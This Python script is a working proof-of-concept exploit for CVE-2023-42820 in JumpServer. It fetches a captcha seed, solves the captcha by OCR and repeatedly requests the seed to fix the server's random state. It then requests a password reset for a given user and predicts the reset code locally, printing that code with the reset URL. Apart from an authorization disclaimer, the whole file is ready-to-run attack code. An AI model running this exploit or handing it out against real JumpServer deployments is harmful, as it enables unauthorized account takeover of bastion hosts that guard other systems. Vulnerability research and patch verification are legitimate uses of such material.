# -*- coding: utf-8 -*-
"""Proof-of-concept checker for CVE-2023-42820 (JumpServer password reset).

The script fetches a captcha seed from the target, replays the seed into
Python's ``random`` module locally, and prints the reset code it expects the
server to have generated.

Use only against systems you own or are explicitly authorized to test.
"""
import argparse
import io
import logging
import random
import re
import string
import sys
from urllib.parse import parse_qs, urljoin, urlparse

import colorlog
import ddddocr
import httpx
from bs4 import BeautifulSoup
from PIL import Image

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36',
}

# Special characters that random_string() may draw from.
string_punctuation = '!#$%&()*+,-.:;<=>?@[]^_~'

# Proxy settings passed to every httpx call; filled in from --proxy.
# NOTE(review): recent httpx releases renamed/removed the ``proxies=`` keyword;
# confirm against the httpx version this script is pinned to.
PROXIES = {}


def banner():
    """Print the tool banner and author information to stdout."""
    print('''
 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██╗  ██╗██████╗  █████╗ ██████╗  ██████╗
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ██║  ██║╚════██╗██╔══██╗╚════██╗██╔═████╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝ █████╔╝██║██╔██║
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗██╔═══╝ ████╔╝██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝           ██║███████╗╚█████╔╝███████╗╚██████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝            ╚═╝╚══════╝ ╚════╝ ╚══════╝ ╚═════╝
        @Auth: C1ph3rX13
        @Blog: https://c1ph3rx13.github.io
        @Note: 代码仅供学习使用,请勿用于其他用途
    ''')


def setup_color_logging():
    """Configure the root logger with a colored stdout handler and return it.

    ``colorlog.getLogger()`` without a name returns the root logger, so the
    handler installed here also serves plain ``logging.*`` calls.
    """
    # Create the colorlog logger.
    logger = colorlog.getLogger()
    logger.setLevel(logging.INFO)

    # Create the console handler and set its format.
    console_handler = logging.StreamHandler(sys.stdout)
    console_formatter = colorlog.ColoredFormatter(
        '%(asctime)s - %(log_color)s%(levelname)s - %(message)s',
        datefmt='%Y-%m-%d %H:%M:%S',
        reset=True,
        log_colors={
            'DEBUG': 'cyan',
            'INFO': 'green',
            'WARNING': 'yellow',
            'ERROR': 'red',
            'CRITICAL': 'bold_red',
        }
    )
    console_handler.setFormatter(console_formatter)

    # Attach the handler to the logger.
    logger.addHandler(console_handler)

    return logger


# Module-wide logger object.
logger = setup_color_logging()


# Reset-code generation, implemented following JumpServer's own code.
def random_string(length: int, lower=True, upper=True, digit=True, special_char=False):
    """Return a random string of ``length`` characters from the enabled classes.

    Every enabled character class must appear at least once, and the first
    character may only be a special character when that is the sole enabled
    class. Draws come from the global ``random`` module, so the result is
    fully determined by the PRNG state at call time.

    The statement order is kept exactly as is: changing the sequence of
    ``random`` calls would change the output for a given PRNG state.

    Raises:
        AssertionError: if no class is enabled, or ``length`` is smaller than
            the number of enabled classes.
    """
    args_names = ['lower', 'upper', 'digit', 'special_char']
    args_values = [lower, upper, digit, special_char]
    args_string = [string.ascii_lowercase, string.ascii_uppercase, string.digits, string_punctuation]
    args_string_map = dict(zip(args_names, args_string))
    kwargs = dict(zip(args_names, args_values))
    kwargs_keys = list(kwargs.keys())
    kwargs_values = list(kwargs.values())
    args_true_count = len([i for i in kwargs_values if i])
    assert any(kwargs_values), f'Parameters {kwargs_keys} must have at least one `True`'
    assert length >= args_true_count, f'Expected length >= {args_true_count}, bug got {length}'

    can_startswith_special_char = args_true_count == 1 and special_char

    chars = ''.join([args_string_map[k] for k, v in kwargs.items() if v])

    while True:
        password = list(random.choice(chars) for i in range(length))
        for k, v in kwargs.items():
            if v and not (set(password) & set(args_string_map[k])):
                # A required character class is missing: retry.
                break
        else:
            if not can_startswith_special_char and password[0] in args_string_map['special_char']:
                # The first character must not be a special character: retry.
                continue
            else:
                # All requirements met: leave the while loop.
                break

    password = ''.join(password)
    return password


def nop_random(seed: str):
    """Seed the global PRNG with ``seed`` and discard a fixed run of draws.

    Performs 4 ``randrange(-35, 35)`` draws followed by
    ``int(180 * 38 * 0.1)`` pairs of ``randint(0, 180)`` / ``randint(0, 38)``.

    NOTE(review): presumably this mirrors the draws the server makes while
    rendering one captcha image, so the local PRNG ends up in the same state
    as the server's -- confirm against the captcha library's source.
    """
    random.seed(seed)
    for i in range(4):
        random.randrange(-35, 35)

    for p in range(int(180 * 38 * 0.1)):
        random.randint(0, 180)
        random.randint(0, 38)


# Request the seed repeatedly to pollute the workers and so pin the seed.
def fix_seed(target: str, seed: str):
    """Request the captcha image for ``seed`` ten times.

    Raises:
        AssertionError: if any response is not ``200`` with an
            ``image/png`` content type.
    """
    def _request(i: int, u: str):
        logger.info('Send %d Request to %s', i, u)
        response = httpx.get(url=u, headers=headers, timeout=5, verify=False, proxies=PROXIES)
        assert response.status_code == httpx.codes.OK
        assert response.headers['Content-Type'] == 'image/png'

    url = urljoin(target, '/core/auth/captcha/image/' + seed + '/')
    for idx in range(10):
        _request(idx, url)


def get_seed(target: str):
    """Fetch the password-reset page and return the captcha seed from it.

    The seed is the second-to-last path segment of the ``src`` attribute of
    the first element matching ``.captcha``.

    Returns:
        The seed string, or ``False`` when the page does not answer ``200``
        or contains no captcha image.
    """
    url = urljoin(target, "/core/auth/password/forget/previewing/")
    response = httpx.get(url=url, headers=headers, follow_redirects=False, verify=False, proxies=PROXIES)

    if response.status_code != httpx.codes.OK:
        return False

    # Extract the seed.
    soup = BeautifulSoup(response.text, "lxml")
    captcha_img = soup.select_one('.captcha')
    captcha_src = captcha_img.get('src') if captcha_img is not None else None
    if not captcha_src:
        # The page has no captcha element; report failure the same way a
        # non-200 response does instead of raising AttributeError.
        logger.error("Captcha Image Not Found")
        return False

    seed = captcha_src.split('/')[-2]
    logger.critical("Get Seed: %r", seed)
    return seed


def ocr_captcha(target: str, max_attempts=5):
    """Fetch a captcha image, OCR it and evaluate the arithmetic it shows.

    Makes at most ``max_attempts`` tries; each try fetches a fresh seed.

    Returns:
        ``(result, seed)`` with ``result`` as a string, or ``None`` when the
        seed cannot be fetched or no attempt yields a usable result.
    """
    # A for loop guarantees the attempt budget is spent on every outcome,
    # including OCR results that cannot be evaluated.
    for _ in range(max_attempts):
        try:
            # Fetch the captcha image.
            seed = get_seed(target)
            if not seed:  # get_seed() signals failure with False
                logger.error("Failed to Get Captcha Seed")
                return None

            image_url = urljoin(target, 'core/auth/captcha/image/' + seed + '/')
            response = httpx.get(url=image_url, headers=headers, verify=False, proxies=PROXIES)
            response.raise_for_status()
        except (httpx.HTTPError, httpx.RequestError) as e:
            logger.error("Failed to Fetch Captcha Image: %s", str(e))
            continue

        # Recognize the image text.
        res_code = recognize_captcha(io.BytesIO(response.content))

        # Evaluate the captcha expression.
        result = calculate_captcha_result(res_code)
        if result is not None:
            logger.critical("Captcha Result: %r", result)
            return str(result), seed

    return None


def recognize_captcha(img_bytes):
    """Run OCR on a captcha image and return the recognized text.

    The image is converted to grayscale and rescaled to a height of 64
    pixels (width scaled proportionally) before classification.

    Args:
        img_bytes: a binary file-like object containing the image.
    """
    ocr = ddddocr.DdddOcr()

    img = Image.open(img_bytes).convert('L')
    new_width = int(img.size[0] * (64 / img.size[1]))
    # Image.ANTIALIAS was an alias of LANCZOS and was removed in Pillow 10.
    img = img.resize((new_width, 64), Image.LANCZOS)

    png_buffer = io.BytesIO()
    img.save(png_buffer, format='PNG')

    res_code = ocr.classification(png_buffer.getvalue())
    logger.warning("Captcha Image Result: %s", res_code)
    return res_code


def calculate_captcha_result(res_code):
    """Evaluate a ``<digit><operator><number>`` expression read by OCR.

    Text is rejected when it is shorter than 3 characters, when its second
    character is not one of ``+ - * / x``, or when it contains ``10`` or
    ``o``.

    Returns:
        The numeric result (a float for division), or ``None`` when the text
        cannot be parsed or evaluated.
    """
    if len(res_code) < 3 or res_code[1] not in ['+', '-', '*', '/', 'x'] or '10' in res_code or 'o' in res_code:
        logger.warning("Failed to Convert Operands to Integers")
        return None

    operator = re.findall(r"[+\-*/x]", res_code)[0]
    operands = re.findall(r"\d+", res_code)
    if len(operands) != 2:
        logger.warning("Failed to Convert Operands to Integers")
        return None

    try:
        a, b = map(int, operands)
        # The original compared the operator string to a list, which is never
        # equal, so this branch could not be reached.
        # NOTE(review): 'x' is grouped with '+' as in the original code;
        # confirm that is the intended reading of an OCR'd 'x'.
        if operator in ("+", "x"):
            result = a + b
        elif operator == "-":
            result = a - b
        elif operator == "*":
            result = a * b
        elif operator == "/":
            result = a / b
        else:
            logger.error("Invalid Operator: %s", operator)
            return None
        return result
    except (ValueError, ZeroDivisionError) as e:
        logger.warning("Failed to Calculate Captcha Result: %s", str(e))
        return None


def get_token(target: str, username: str):
    """Submit the password-reset form and return the token from the final URL.

    Returns:
        The ``token`` query parameter of the URL the POST ends up at, or an
        empty string when that parameter is absent.

    Raises:
        AssertionError: if the form page or the POST does not answer ``200``.
        RuntimeError: if the captcha could not be solved.
    """
    url = urljoin(target, "/core/auth/password/forget/previewing/")

    # Fetch the csrf token.
    with httpx.Client(headers=headers, follow_redirects=True, verify=False, proxies=PROXIES) as client:
        token_resp = client.get(url=url)
        assert token_resp.status_code == httpx.codes.OK

        # Parse the form parameters.
        soup = BeautifulSoup(token_resp.text, "lxml")

        # Extract the csrf token.
        csrf_token = soup.find('input', {'name': 'csrfmiddlewaretoken'}).get('value')
        logger.critical("Get Csrf_Token: %s", csrf_token)

        # Obtain the captcha seed and the solved captcha value.
        captcha = ocr_captcha(target)
        if captcha is None:
            # Fail with a clear message instead of an unpacking TypeError.
            raise RuntimeError("Failed to solve captcha")
        token_captcha, token_seed = captcha

        # Send the form POST request.
        csrf_cookies = token_resp.cookies
        data = {
            'csrfmiddlewaretoken': csrf_token,
            'username': username,
            'captcha_0': token_seed,
            'captcha_1': token_captcha,
        }
        response = client.post(url=url, data=data, cookies=csrf_cookies)
        assert response.status_code == httpx.codes.OK

        # Extract the token from the final URL.
        parsed_url = urlparse(str(response.url))
        query_dict = parse_qs(parsed_url.query)
        reset_token = query_dict.get('token', [''])[0]
        logger.critical("Get Token: %s", reset_token)

    return str(reset_token)


def send_code(target: str, email: str, reset_token: str):
    """Ask the target to send a reset code by email for ``reset_token``.

    Returns:
        ``True`` when the endpoint answers ``200``, otherwise ``False``.
    """
    url = urljoin(target, "/api/v1/authentication/password/reset-code/?token=" + reset_token)
    payload = {
        'email': email,
        'sms': '',
        'form_type': 'email',
    }
    response = httpx.post(url=url, json=payload, headers=headers, follow_redirects=False, verify=False,
                          proxies=PROXIES)

    if response.status_code != httpx.codes.OK:
        return False

    logger.info("Send Code Headers: %r Response: %r", response.headers, response.text)
    return True


def _version_tuple(version: str):
    """Convert a dotted numeric version such as ``'3.6.4'`` to an int tuple."""
    return tuple(int(part) for part in version.split('.'))


def check_version(target: str):
    """Detect the target's version and report whether it is in range.

    The version is read from the JS bundle referenced on the target's landing
    page. The process exits if no bundle reference is found.

    Returns:
        ``True`` when the detected version is within the checked range,
        otherwise ``False`` (including when the seed page is unreachable or
        no version string can be found).
    """
    if not get_seed(target):
        return False

    # Send GET requests to fetch the page content.
    with httpx.Client(headers=headers, verify=False, follow_redirects=True, proxies=PROXIES) as client:
        page_content = client.get(url=target).text

        # Looks like: src=/ui/assets/js/<file>
        # The named group must be called jsFile because it is read back below.
        match = re.search(r'src=/ui/assets/js/(?P<jsFile>[a-zA-Z0-9.]+)>', page_content)
        if not match:
            logger.critical("Not Found")
            sys.exit()

        js_file = match.group('jsFile')
        logger.critical("Found JSFile: %s", js_file)

        js_url = f"{target}/ui/assets/js/{js_file}"
        js_content = client.get(url=js_url).text

    # Extract the version number; the first pattern takes precedence.
    version_match = (re.search(r'value:"v(\d+\.\d+\.\d+)"', js_content)
                     or re.search(r'version:"(\d+\.\d+\.\d+)"', js_content))
    if not version_match:
        logger.critical("Not Found")
        return False

    version = version_match.group(1)
    logger.critical("Found Version: %s", version)

    # Check against the vulnerable range, one threshold per release line.
    # With a plain `or` of two upper bounds the 2.x threshold had no effect.
    # NOTE(review): thresholds are the ones from the original code; verify
    # them against the vendor advisory.
    parsed = _version_tuple(version)
    if parsed <= (2, 28, 20) or (3, 0, 0) <= parsed <= (3, 7, 1):
        logger.critical("Vulnerable")
        return True

    return False


def main(target: str, email: str, username: str):
    """Run the full check against ``target`` and log the outcome."""
    if not check_version(target):
        logger.critical("Not Vulnerable")
        return

    # Fetch the seed.
    seed = get_seed(target)
    if not seed:
        # get_seed() returns False on failure; stop before it reaches
        # string concatenation in fix_seed().
        logger.critical("Failed to Get Captcha Seed")
        return

    # Fetch the token.
    reset_token = get_token(target, username)

    # POST
    fix_seed(target, seed)
    nop_random(seed)

    if send_code(target, email, reset_token):
        code = random_string(6, lower=False, upper=False)
        logger.critical("Your Code is %s", code)
        reset_url = urljoin(target, '/core/auth/password/forgot/?token=' + reset_token)
        logger.critical('Reset Url: %s', reset_url)
    else:
        logger.critical("Send Code Fail")


if __name__ == '__main__':
    banner()

    parser = argparse.ArgumentParser(description='CVE-2023-42820 by C1ph3rX13.')
    parser.add_argument('-t', '--target', type=str, required=True, help='target url')
    parser.add_argument('-e', '--email', type=str, required=True, help='account email')
    parser.add_argument('-u', '--username', type=str, required=True, help='account username')
    parser.add_argument("--proxy", type=str, required=False, help="proxy to http://ip:port")
    args = parser.parse_args()

    if args.proxy:
        PROXIES = {'all://': f'{args.proxy}'}

    main(args.target, args.email, args.username)